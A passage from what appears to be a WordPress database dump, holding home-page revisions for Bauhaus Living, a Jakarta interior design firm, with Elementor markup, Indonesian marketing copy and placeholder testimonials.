href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:04:40','2023-09-22 10:04:40','',22,'https://bauhaus.futuremediatrix.com/?p=4926',0,'revision','',0),(4927,3,'2023-09-22 10:05:25','2023-09-22 10:05:25','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:05:25','2023-09-22 10:05:25','',22,'https://bauhaus.futuremediatrix.com/?p=4927',0,'revision','',0),(4928,3,'2023-09-22 10:05:25','2023-09-22 10:05:25','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 